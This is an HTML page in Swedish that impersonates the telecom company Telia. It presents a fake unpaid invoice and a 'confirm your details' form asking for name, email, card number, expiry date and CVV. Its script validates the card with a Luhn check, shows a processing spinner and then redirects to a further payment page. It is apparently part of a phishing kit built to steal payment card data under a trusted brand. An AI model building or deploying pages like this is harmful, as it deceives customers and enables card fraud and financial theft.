<!DOCTYPE html>
<html lang="sv" dir="ltr">
<head>
  <meta charset="utf-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta name="referrer" content="no-referrer"/>
  <meta http-equiv="X-Content-Type-Options" content="nosniff"/>
  <meta http-equiv="Permissions-Policy" content="geolocation=(), microphone=(), camera=()"/>
  <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src 'self' https://upload.wikimedia.org data:; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'; connect-src 'self'; frame-ancestors 'none'; base-uri 'self'"/>
  <title>Telia – Bekräfta dina uppgifter</title>
  <meta name="description" content="Bekräfta dina uppgifter för att kunna slutföra din betalning. Dina uppgifter behandlas säkert enligt Telias integritetspolicy."/>
  <meta name="theme-color" content="#6E1E78"/>
  <link rel="canonical" href="https://example.com/verify"/>
  <meta property="og:title" content="Telia – Bekräfta dina uppgifter"/>
  <meta property="og:description" content="Fyll i dina uppgifter för att fortsätta till betalning."/>
  <meta property="og:type" content="website"/>
  <link rel="icon" href="data:,"/>

  <style>
  :root{
    --primary:#6E1E78;
    --primary-600:#7C3AED;
    --primary-900:#2b0d4f;
    --bg:#F8F8FC;
    --surface:#FFFFFF;
    --ink:#0F172A;
    --muted:#475569;
    --border:#E5E7EB;
    --error:#DC2626;
    --error-bg:#FEF2F2;
    --success:#16A34A;
    --font:'Inter', system-ui, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
    --fs-12:12px;
    --fs-14:14px;
    --fs-16:16px;
    --fs-18:18px;
    --fs-28:28px;
    --fs-44:44px;
    --s3:12px;
    --s4:16px;
    --s6:24px;
    --s10:40px;
    --s12:48px;
    --radius-lg:20px;
    --radius-md:16px;
    --radius-sm:10px;
    --shadow-sm:0 2px 10px rgba(0,0,0,.06);
    --shadow-md:0 8px 24px rgba(0,0,0,.12);
    --shadow-lg:0 10px 30px rgba(0,0,0,.15);
  }

  *{box-sizing:border-box;margin:0;padding:0}
  html,body{height:100%}
  html{scroll-behavior:smooth}
  body{
    font-family:var(--font);
    background:var(--bg);
    color:var(--ink);
    -webkit-font-smoothing:antialiased;
    line-height:1.6;
    font-size:var(--fs-16);
    padding-left:env(safe-area-inset-left);
    padding-right:env(safe-area-inset-right);
  }
  a{color:var(--primary);text-decoration:none}
  a:hover{color:var(--primary-600)}
  img{max-width:100%;height:auto;display:block}
  .container{max-width:1120px;margin:0 auto;padding-inline:clamp(16px,4vw,24px)}

  :focus-visible{outline:3px solid #a78bfa;outline-offset:3px;border-radius:6px}
  .sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0}

  /* Header */
  header.site-header{background:var(--surface);box-shadow:var(--shadow-sm);position:sticky;top:0;z-index:100}
  .topbar{max-width:1160px;margin:0 auto;padding:0 var(--s6);display:flex;align-items:center;justify-content:space-between;min-height:84px}
  .brand{display:flex;align-items:center;gap:var(--s3)}
  .logo{height:44px;width:auto}
  nav.primary{flex:1;display:flex;align-items:center;justify-content:center;gap:28px}
  nav.primary a{font-weight:600;font-size:15px}
  nav.actions{min-width:140px;display:flex;align-items:center;justify-content:flex-end;gap:10px}
  nav.actions a{font-weight:600;display:inline-flex;align-items:center;gap:6px;padding:8px 10px;border-radius:var(--radius-sm)}
  nav.actions a:hover{background:#F3E8FF}

  /* Breadcrumbs */
  .breadcrumbs{background:#F8F8FC;border-top:1px solid #EEF;border-bottom:1px solid #EEF}
  .breadcrumbs ol{max-width:1120px;margin:0 auto;padding:8px var(--s6);display:flex;gap:10px;list-style:none;flex-wrap:wrap}
  .breadcrumbs li+li::before{content:'›';margin:0 6px;color:#9CA3AF}
  .breadcrumbs li[aria-current="page"]{color:#6B7280}

  /* Hero Section */
  .hero{
    display:flex;
    align-items:flex-start;
    justify-content:center;
    gap:clamp(var(--s6),4vw,var(--s10));
    flex-wrap:wrap;
    max-width:1120px;
    margin:clamp(24px,6vw,var(--s12)) auto;
    padding:clamp(20px,6vw,var(--s12)) clamp(16px,4vw,var(--s6));
    background:var(--primary);
    border-radius:var(--radius-lg);
    box-shadow:var(--shadow-md);
    color:#fff;
  }
  .hero__left{flex:1 1 56%;display:flex;flex-direction:column;justify-content:center}
  .hero__left h1{font-size:clamp(var(--fs-28),3.2vw,var(--fs-44));margin-bottom:var(--s3);line-height:1.12}
  .hero__left p{font-size:clamp(15px,1.2vw,18px);opacity:.96;margin-bottom:var(--s6)}
  .hero__right{flex:1 1 38%;display:flex;align-items:flex-start;justify-content:center}

  /* Form Styles */
  .user-form .grid{display:grid;grid-template-columns:repeat(2,1fr);gap:18px 24px;align-items:start}
  .field--full{grid-column:1 / -1}
  .field{display:flex;flex-direction:column;gap:6px}
  .field label{font-size:var(--fs-14);font-weight:600;color:#F8FAFC;letter-spacing:.2px}
  .field input{
    height:52px;
    border-radius:12px;
    border:2px solid transparent;
    background:#fff;
    padding:0 14px;
    font-size:var(--fs-16);
    width:100%;
    transition:border-color .2s ease, box-shadow .2s ease;
  }
  .field input:hover{border-color:#d1d5db}
  .field input:focus{outline:none;border-color:var(--primary-600);box-shadow:0 0 0 4px rgba(124,58,237,.18)}
  .field input::placeholder{color:#94A3B8}
  .field input.error{border-color:var(--error);background:var(--error-bg)}
  .field input.valid{border-color:var(--success)}
  .hint{font-size:var(--fs-12);opacity:.85;margin-top:2px}
  .error-msg{color:#FCA5A5;font-size:var(--fs-12);margin-top:2px;display:none}
  .field.has-error .error-msg{display:block}

  .field-row{grid-column:1 / -1;display:grid;grid-template-columns:repeat(2,1fr);gap:18px 24px}

  /* Invoice Card */
  .invoice{
    background:var(--surface);
    color:var(--ink);
    border-radius:16px;
    padding:22px 20px 26px;
    box-shadow:var(--shadow-lg);
    max-width:360px;
    width:100%;
    border:1px solid rgba(17,17,17,.06);
  }
  .invoice__head{display:flex;justify-content:space-between;align-items:center;margin-bottom:10px}
  .invoice__head h2{margin:0;font-size:18px;font-weight:700;color:var(--ink)}
  .badge{background:#fde047;color:#7a5800;border-radius:999px;padding:4px 10px;font-size:13px;font-weight:600}
  .invoice__meta{display:grid;grid-template-columns:auto 1fr;gap:6px 12px;font-size:14px;color:#333;margin:8px 0 12px}
  .invoice__meta dt{opacity:.7}
  .invoice__meta dd{margin:0;text-align:right}
  .invoice__sum{background:#f9fafb;border:1px solid #e5e7eb;border-radius:12px;padding:14px;text-align:center;margin:16px 0}
  .invoice__sum .label{font-size:13px;color:#6b7280}
  .invoice__sum .value{font-size:28px;font-weight:800;margin-top:4px}
  .invoice__sum .vat{font-size:12px;color:#6b7280}
  .invoice__footer{text-align:center;font-size:13px;color:#555;margin-top:14px}

  /* Pay Button */
  .btn-pay{
    display:block;
    width:100%;
    text-align:center;
    padding:14px 18px;
    border:none;
    border-radius:12px;
    font-weight:700;
    font-size:var(--fs-16);
    color:#fff;
    background:linear-gradient(90deg,#6E1E78,#EA4C89);
    box-shadow:0 6px 16px rgba(0,0,0,.16);
    cursor:pointer;
    transition:transform .15s ease, filter .15s ease, opacity .15s ease;
  }
  .btn-pay:hover{filter:brightness(1.05);transform:translateY(-1px)}
  .btn-pay:active{transform:translateY(0)}
  .btn-pay:disabled{opacity:.6;cursor:not-allowed;transform:none}

  /* Trust Strip */
  .trust-strip{background:var(--surface);border-radius:16px;box-shadow:0 6px 18px rgba(0,0,0,.08);max-width:1120px;margin:var(--s10) auto;padding:var(--s6)}
  .trust-grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(240px,1fr));gap:var(--s6);text-align:center}
  .trust{display:flex;align-items:center;justify-content:center;gap:10px;color:var(--ink);font-weight:600}
  .trust .ic{background:var(--primary);color:#fff;width:28px;height:28px;display:flex;align-items:center;justify-content:center;border-radius:50%;font-weight:700}
  .trust small{display:block;color:#555;font-weight:400}

  /* Footer */
  footer.site-footer{background:#2b0d4f;color:#fff;padding:72px var(--s6) 48px;margin-top:72px}
  .footer-columns{max-width:1120px;margin:0 auto;display:grid;grid-template-columns:repeat(auto-fit,minmax(200px,1fr));gap:clamp(24px,5vw,56px)}
  .footer-col h4{font-size:16px;margin-bottom:14px;font-weight:700;color:#fff}
  .footer-col ul{list-style:none}
  .footer-col li{margin-bottom:12px}
  .footer-col a{color:#B8A3FF;font-size:14px}
  .footer-col a:hover{color:#fff;text-decoration:underline}
  .footer-bottom{max-width:1120px;margin:40px auto 0;text-align:center;font-size:13px;opacity:.9}
  .footer-social{margin-bottom:16px;display:flex;justify-content:center;gap:12px}
  .footer-social .soc{width:36px;height:36px;border-radius:50%;background:#6E1E78;color:#fff;font-weight:700;display:flex;align-items:center;justify-content:center;font-size:14px}
  .footer-social .soc:hover{background:#7C3AED}

  /* Modal */
  .modal-overlay{position:fixed;inset:0;background:rgba(17,24,39,.55);backdrop-filter:blur(2px);display:none;align-items:center;justify-content:center;z-index:9999}
  .modal-overlay.active{display:flex}
  .modal{background:var(--surface);border-radius:16px;box-shadow:var(--shadow-lg);width:min(440px,92vw);padding:24px 22px;text-align:center}
  .modal h2{font-size:var(--fs-18);color:#111827;margin-bottom:8px}
  .modal p{font-size:var(--fs-14);color:#374151}
  .spinner{width:44px;height:44px;border-radius:50%;border:4px solid #E5E7EB;border-top-color:var(--primary);margin:14px auto 10px;animation:spin 900ms linear infinite}
  @keyframes spin{to{transform:rotate(360deg)}}

  /* Responsive */
  @media (max-width:980px){
    nav.primary{display:none}
    .topbar{padding:0 var(--s4);min-height:70px}
    .logo{max-height:40px}
  }
  @media (max-width:768px){
    .hero{flex-direction:column;margin:24px auto;gap:24px;border-radius:14px}
    .hero__left,.hero__right{width:100%}
    .user-form .grid{grid-template-columns:1fr;gap:14px}
    .field-row{grid-template-columns:1fr}
    .field input{height:50px;font-size:16px}
    .invoice{max-width:100%;padding:18px}
  }
  @media (max-width:420px){
    .invoice__meta{grid-template-columns:1fr}
    .invoice__meta dd{text-align:left}
  }
  </style>
</head>
<body>
  <a href="#main" class="sr-only">Hoppa till innehållet</a>

  <header class="site-header">
    <div class="topbar">
      <a class="brand" href="/" aria-label="Telia startsida">
        <img src="https://upload.wikimedia.org/wikipedia/commons/7/7c/Telia_logo_2022.svg" alt="Telia" class="logo" width="140" height="44"/>
      </a>
      <nav class="primary" aria-label="Huvudmeny">
        <a href="#">Mobil</a>
        <a href="#">Bredband</a>
        <a href="#">TV &amp; streaming</a>
        <a href="#">Support</a>
        <a href="#">Erbjudanden</a>
      </nav>
      <nav class="actions" aria-label="Snabblänkar">
        <a href="#">
          <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" fill="currentColor" viewBox="0 0 24 24">
            <path d="M12 2a4 4 0 0 1 4 4v1a4 4 0 1 1-8 0V6a4 4 0 0 1 4-4zm6 18H6a2 2 0 0 1-2-2c0-3.313 3.582-6 8-6s8 2.687 8 6a2 2 0 0 1-2 2z"/>
          </svg>
          <span>Logga ut</span>
        </a>
      </nav>
    </div>
  </header>

  <nav class="breadcrumbs" aria-label="Brödsmulor">
    <ol>
      <li><a href="#">Start</a></li>
      <li><a href="#">Kund</a></li>
      <li aria-current="page">Uppdatera uppgifter</li>
    </ol>
  </nav>

  <main id="main" tabindex="-1">
    <section class="hero container">
      <div class="hero__left">
        <h1>Bekräfta dina uppgifter</h1>
        <p>Fyll i fälten nedan för att fortsätta. Kontrollera att uppgifterna är korrekta innan du går vidare.</p>

        <form class="user-form" id="paymentForm" autocomplete="on" novalidate>
          <div class="grid">
            <div class="field" id="lastNameField">
              <label for="lastName">Efternamn *</label>
              <input id="lastName" name="lastName" type="text" placeholder="Svensson" autocomplete="family-name" required>
              <span class="error-msg">Vänligen ange ditt efternamn</span>
            </div>
            <div class="field" id="firstNameField">
              <label for="firstName">Förnamn *</label>
              <input id="firstName" name="firstName" type="text" placeholder="Anna" autocomplete="given-name" required>
              <span class="error-msg">Vänligen ange ditt förnamn</span>
            </div>
            <div class="field field--full" id="emailField">
              <label for="email">E-post *</label>
              <input id="email" name="email" type="email" placeholder="namn@example.com" autocomplete="email" required>
              <span class="error-msg">Vänligen ange en giltig e-postadress</span>
            </div>
            <div class="field field--full" id="cardNumberField">
              <label for="cardNumber">Kortnummer *</label>
              <input id="cardNumber" name="cardNumber" type="text" placeholder="1234 5678 9012 3456" inputmode="numeric" autocomplete="cc-number" maxlength="19" required>
              <span class="error-msg">Vänligen ange ett giltigt kortnummer (16 siffror)</span>
            </div>
            <div class="field-row">
              <div class="field" id="cardExpiryField">
                <label for="cardExpiry">Giltighetstid (MM/ÅÅ) *</label>
                <input id="cardExpiry" name="cardExpiry" type="text" placeholder="MM/ÅÅ" inputmode="numeric" autocomplete="cc-exp" maxlength="5" required>
                <span class="error-msg">Vänligen ange ett giltigt datum</span>
              </div>
              <div class="field" id="cvvField">
                <label for="cvv">Säkerhetskod (CVV) *</label>
                <input id="cvv" name="cvv" type="text" placeholder="1234" inputmode="numeric" autocomplete="cc-csc" maxlength="4" required>
                <span class="error-msg">Vänligen ange 4 siffror</span>
              </div>
            </div>
          </div>
        </form>
      </div>

      <div class="hero__right">
        <aside class="invoice">
          <div class="invoice__head">
            <h2>Fakturasammanställning</h2>
            <span class="badge">Obetald</span>
          </div>
          <dl class="invoice__meta">
            <dt>Fakturanummer</dt><dd>SE-482915</dd>
            <dt>Förfallodatum</dt><dd>20 okt 2025</dd>
          </dl>
          <div class="invoice__sum">
            <div class="label">Belopp att betala</div>
            <div class="value">349,00 SEK</div>
            <div class="vat">inkl. moms</div>
          </div>

          <button type="submit" form="paymentForm" class="btn-pay" id="payBtn">Betala fakturan</button>

          <div class="invoice__footer">
            <div>Bankgiro: 5240-1234</div>
            <div>Ange OCR vid betalning.</div>
          </div>
        </aside>
      </div>
    </section>

    <section class="trust-strip container">
      <div class="trust-grid">
        <div class="trust"><span class="ic">✔</span><div><strong>Trygg betalning</strong><small>SSL och säker verifiering</small></div></div>
        <div class="trust"><span class="ic">✔</span><div><strong>Fri frakt</strong><small>Snabb leverans i hela landet</small></div></div>
        <div class="trust"><span class="ic">✔</span><div><strong>Kundsupport dygnet runt</strong><small>Vi hjälper dig när som helst</small></div></div>
      </div>
    </section>
  </main>

  <div class="modal-overlay" id="loadingModal" role="dialog" aria-modal="true">
    <div class="modal">
      <div class="spinner"></div>
      <h2>Bearbetar din begäran …</h2>
      <p>Vänligen vänta i några sekunder.</p>
    </div>
  </div>

  <footer class="site-footer">
    <div class="container footer-columns">
      <div class="footer-col">
        <h4>Rekommenderat</h4>
        <ul>
          <li><a href="#">iPhone 17</a></li>
          <li><a href="#">Nya iPhone</a></li>
          <li><a href="#">Samsung Galaxy S25</a></li>
          <li><a href="#">Mobiltelefoner</a></li>
          <li><a href="#">Mobilabonnemang</a></li>
          <li><a href="#">Bredband</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <h4>Det är Telia</h4>
        <ul>
          <li><a href="#">Om Telia</a></li>
          <li><a href="#">Press</a></li>
          <li><a href="#">Jobba hos oss</a></li>
          <li><a href="#">5G</a></li>
          <li><a href="#">Integritetspolicy</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <h4>Handla hos Telia</h4>
        <ul>
          <li><a href="#">Support</a></li>
          <li><a href="#">Kontakta oss</a></li>
          <li><a href="#">Köpinformation</a></li>
          <li><a href="#">Villkor</a></li>
          <li><a href="#">Teliabutiker</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <h4>Hållbarhet</h4>
        <ul>
          <li><a href="#">Panta mobilen</a></li>
          <li><a href="#">Begagnade mobiler</a></li>
          <li><a href="#">Hållbarhetsarbete</a></li>
          <li><a href="#">Miljöarbete</a></li>
        </ul>
      </div>
    </div>
    <div class="container footer-bottom">
      <div class="footer-social">
        <a href="#" class="soc" aria-label="Facebook">F</a>
        <a href="#" class="soc" aria-label="Instagram">I</a>
        <a href="#" class="soc" aria-label="LinkedIn">L</a>
      </div>
      <small>© 2025 Telia. Alla rättigheter förbehållna.</small>
    </div>
  </footer>

  <script>
  (function() {
    'use strict';

    // Elements
    const form = document.getElementById('paymentForm');
    const modal = document.getElementById('loadingModal');
    const btn = document.getElementById('payBtn');

    const fields = {
      firstName: {
        input: document.getElementById('firstName'),
        field: document.getElementById('firstNameField'),
        validate: (val) => val.trim().length >= 2
      },
      lastName: {
        input: document.getElementById('lastName'),
        field: document.getElementById('lastNameField'),
        validate: (val) => val.trim().length >= 2
      },
      email: {
        input: document.getElementById('email'),
        field: document.getElementById('emailField'),
        validate: (val) => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(val)
      },
      cardNumber: {
        input: document.getElementById('cardNumber'),
        field: document.getElementById('cardNumberField'),
        validate: (val) => {
          const digits = val.replace(/\D/g, '');
          if (digits.length !== 16) return false;
          // Luhn algorithm
          let sum = 0, shouldDouble = false;
          for (let i = digits.length - 1; i >= 0; i--) {
            let digit = parseInt(digits[i], 10);
            if (shouldDouble) {
              digit *= 2;
              if (digit > 9) digit -= 9;
            }
            sum += digit;
            shouldDouble = !shouldDouble;
          }
          return sum % 10 === 0;
        }
      },
      cardExpiry: {
        input: document.getElementById('cardExpiry'),
        field: document.getElementById('cardExpiryField'),
        validate: (val) => {
          const digits = val.replace(/\D/g, '');
          if (digits.length !== 4) return false;
          const mm = parseInt(digits.slice(0, 2), 10);
          const yy = parseInt(digits.slice(2), 10);
          if (mm < 1 || mm > 12) return false;
          const now = new Date();
          const curYY = now.getFullYear() % 100;
          const curMM = now.getMonth() + 1;
          if (yy < curYY) return false;
          if (yy === curYY && mm < curMM) return false;
          return true;
        }
      },
      cvv: {
        input: document.getElementById('cvv'),
        field: document.getElementById('cvvField'),
        validate: (val) => /^\d{4}$/.test(val.replace(/\D/g, ''))
      }
    };

    // Format card number as user types
    fields.cardNumber.input.addEventListener('input', function() {
      let digits = this.value.replace(/\D/g, '').slice(0, 16);
      let formatted = digits.replace(/(\d{4})(?=\d)/g, '$1 ');
      this.value = formatted;
      validateField('cardNumber');
    });

    // Format expiry date as user types
    fields.cardExpiry.input.addEventListener('input', function() {
      let digits = this.value.replace(/\D/g, '').slice(0, 4);
      if (digits.length > 2) {
        this.value = digits.slice(0, 2) + '/' + digits.slice(2);
      } else {
        this.value = digits;
      }
      validateField('cardExpiry');
    });

    // CVV - only digits
    fields.cvv.input.addEventListener('input', function() {
      this.value = this.value.replace(/\D/g, '').slice(0, 4);
      validateField('cvv');
    });

    // Validate on blur for all fields
    Object.keys(fields).forEach(key => {
      fields[key].input.addEventListener('blur', () => validateField(key));
      fields[key].input.addEventListener('input', () => {
        // Remove error state while typing
        if (fields[key].field.classList.contains('has-error')) {
          fields[key].input.classList.remove('error');
          fields[key].field.classList.remove('has-error');
        }
      });
    });

    function validateField(key) {
      const { input, field, validate } = fields[key];
      const isValid = validate(input.value);
      
      input.classList.toggle('error', !isValid && input.value.length > 0);
      input.classList.toggle('valid', isValid);
      field.classList.toggle('has-error', !isValid && input.value.length > 0);
      
      return isValid;
    }

    function validateAll() {
      let isValid = true;
      let firstInvalid = null;

      Object.keys(fields).forEach(key => {
        const { input, field, validate } = fields[key];
        const fieldValid = validate(input.value);
        
        input.classList.toggle('error', !fieldValid);
        input.classList.toggle('valid', fieldValid);
        field.classList.toggle('has-error', !fieldValid);
        
        if (!fieldValid && isValid) {
          isValid = false;
          firstInvalid = input;
        }
      });

      if (firstInvalid) {
        firstInvalid.focus();
      }

      return isValid;
    }

    // Form submission
    form.addEventListener('submit', function(e) {
      e.preventDefault();

      if (!validateAll()) {
        return;
      }

      // Show loading modal
      modal.classList.add('active');
      btn.disabled = true;

      // Redirect after 3 seconds
      setTimeout(function() {
        window.location.href = 'pay.html';
      }, 3000);
    });

    // Prevent ESC from closing modal during processing
    window.addEventListener('keydown', function(e) {
      if (e.key === 'Escape' && modal.classList.contains('active')) {
        e.preventDefault();
      }
    });
  })();
  </script>
</body>
</html>
